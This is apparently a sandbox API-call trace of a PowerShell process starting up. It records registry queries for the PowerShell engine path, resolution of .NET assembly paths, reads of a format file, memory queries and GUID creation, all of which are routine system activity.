	[0346.491] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1ec, lpData=0x0, lpcbData=0xad1e8*=0x0 | out: lpType=0xad1ec*=0x1, lpData=0x0, lpcbData=0xad1e8*=0x56) returned 0x0
	[0346.491] CoTaskMemAlloc (cb=0x5a) returned 0x254ca0
	[0346.491] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1bc, lpData=0x254ca0, lpcbData=0xad1b8*=0x56 | out: lpType=0xad1bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad1b8*=0x56) returned 0x0
	[0346.491] CoTaskMemFree (pv=0x254ca0) 
	[0346.492] RegCloseKey (hKey=0x2fc) returned 0x0
	[0346.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0346.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0346.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0346.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0346.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0346.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0346.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0346.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0346.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0346.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0346.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0346.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0346.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0346.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0346.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0346.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0346.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0346.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.273] VirtualQuery (in: lpAddress=0xabd00, lpBuffer=0xacbc0, dwLength=0x30 | out: lpBuffer=0xacbc0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.274] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x485969b7, Data2=0x2c40, Data3=0x4f9c, Data4=([0]=0x91, [1]=0x5b, [2]=0x63, [3]=0x60, [4]=0x7f, [5]=0x9a, [6]=0xfd, [7]=0xe0))) returned 0x0
	[0347.275] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x602a93dc, Data2=0x159c, Data3=0x4e6f, Data4=([0]=0x9a, [1]=0x3b, [2]=0x3c, [3]=0xdb, [4]=0xbd, [5]=0xda, [6]=0x7a, [7]=0x17))) returned 0x0
	[0347.276] VirtualQuery (in: lpAddress=0xabeb0, lpBuffer=0xacd70, dwLength=0x30 | out: lpBuffer=0xacd70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.276] VirtualQuery (in: lpAddress=0xabeb0, lpBuffer=0xacd70, dwLength=0x30 | out: lpBuffer=0xacd70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.277] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd8cb8f37, Data2=0xe501, Data3=0x4297, Data4=([0]=0xaa, [1]=0x61, [2]=0x7c, [3]=0x10, [4]=0x29, [5]=0xd2, [6]=0xdd, [7]=0xca))) returned 0x0
	[0347.279] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x8c46a1cf, Data2=0xb459, Data3=0x477e, Data4=([0]=0xa9, [1]=0xef, [2]=0xd0, [3]=0x9e, [4]=0x93, [5]=0x34, [6]=0x89, [7]=0x45))) returned 0x0
	[0347.279] VirtualQuery (in: lpAddress=0xac100, lpBuffer=0xacfc0, dwLength=0x30 | out: lpBuffer=0xacfc0*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.280] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.280] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.280] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x3a58f8e4, Data2=0xc452, Data3=0x42f2, Data4=([0]=0x85, [1]=0x74, [2]=0xd4, [3]=0xca, [4]=0x55, [5]=0x50, [6]=0x9, [7]=0xe0))) returned 0x0
	[0347.280] VirtualQuery (in: lpAddress=0xac100, lpBuffer=0xacfc0, dwLength=0x30 | out: lpBuffer=0xacfc0*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.280] VirtualQuery (in: lpAddress=0xabf20, lpBuffer=0xacde0, dwLength=0x30 | out: lpBuffer=0xacde0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.280] VirtualQuery (in: lpAddress=0xab770, lpBuffer=0xac630, dwLength=0x30 | out: lpBuffer=0xac630*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.281] VirtualQuery (in: lpAddress=0xab770, lpBuffer=0xac630, dwLength=0x30 | out: lpBuffer=0xac630*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.281] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x7181ba0d, Data2=0x3255, Data3=0x48c9, Data4=([0]=0xb3, [1]=0x36, [2]=0x1, [3]=0x1c, [4]=0x10, [5]=0xe0, [6]=0x54, [7]=0xb4))) returned 0x0
	[0347.281] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xf2013dcd, Data2=0xe3ea, Data3=0x422d, Data4=([0]=0xb1, [1]=0x30, [2]=0xdf, [3]=0xe4, [4]=0x12, [5]=0xa7, [6]=0xdb, [7]=0x92))) returned 0x0
	[0347.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.281] SetErrorMode (uMode=0x1) returned 0x1
	[0347.281] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0347.281] GetFileType (hFile=0x2fc) returned 0x1
	[0347.281] SetErrorMode (uMode=0x1) returned 0x1
	[0347.282] GetFileType (hFile=0x2fc) returned 0x1
	[0347.282] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.283] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.283] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.283] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.284] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.284] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.284] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.284] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.285] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.285] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.285] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.285] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.286] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.286] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.286] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.286] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.287] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.287] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0xbce, lpOverlapped=0x0) returned 1
	[0347.288] ReadFile (in: hFile=0x2fc, lpBuffer=0x355a6ce, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355a6ce*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0347.288] ReadFile (in: hFile=0x2fc, lpBuffer=0x355af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x355af98*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0347.288] CloseHandle (hObject=0x2fc) returned 1
	[0347.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.288] SetErrorMode (uMode=0x1) returned 0x1
	[0347.288] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad180 | out: lpFileInformation=0xad180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0347.288] SetErrorMode (uMode=0x1) returned 0x1
	[0347.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.288] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad268 | out: phkResult=0xad268*=0x2fc) returned 0x0
	[0347.288] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1ec, lpData=0x0, lpcbData=0xad1e8*=0x0 | out: lpType=0xad1ec*=0x1, lpData=0x0, lpcbData=0xad1e8*=0x56) returned 0x0
	[0347.288] CoTaskMemAlloc (cb=0x5a) returned 0x254e60
	[0347.288] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1bc, lpData=0x254e60, lpcbData=0xad1b8*=0x56 | out: lpType=0xad1bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad1b8*=0x56) returned 0x0
	[0347.289] CoTaskMemFree (pv=0x254e60) 
	[0347.289] RegCloseKey (hKey=0x2fc) returned 0x0
	[0347.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.607] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xcba3425d, Data2=0xa50, Data3=0x43e3, Data4=([0]=0x9f, [1]=0xa9, [2]=0xbe, [3]=0xe2, [4]=0x5a, [5]=0x13, [6]=0xf4, [7]=0x2d))) returned 0x0
	[0347.607] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x2d35909, Data2=0xd540, Data3=0x41f0, Data4=([0]=0xbc, [1]=0xe9, [2]=0xb8, [3]=0x68, [4]=0xbd, [5]=0x40, [6]=0xae, [7]=0x10))) returned 0x0
	[0347.607] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd4b2aea5, Data2=0x154a, Data3=0x497b, Data4=([0]=0x96, [1]=0xfa, [2]=0xf3, [3]=0x1c, [4]=0x5f, [5]=0x48, [6]=0xc1, [7]=0x10))) returned 0x0
	[0347.607] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x1c82190b, Data2=0x9847, Data3=0x4dc7, Data4=([0]=0x8c, [1]=0xb4, [2]=0xa7, [3]=0x4c, [4]=0x3b, [5]=0xcc, [6]=0x6e, [7]=0x85))) returned 0x0
	[0347.607] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xae5252e0, Data2=0x8448, Data3=0x4f6e, Data4=([0]=0xb0, [1]=0xfd, [2]=0x3d, [3]=0xa, [4]=0x12, [5]=0xcc, [6]=0x9c, [7]=0x4b))) returned 0x0
	[0347.608] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x21cc274c, Data2=0x865d, Data3=0x48c1, Data4=([0]=0x9f, [1]=0xe7, [2]=0x1f, [3]=0x71, [4]=0x98, [5]=0xd4, [6]=0x59, [7]=0x14))) returned 0x0
	[0347.608] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
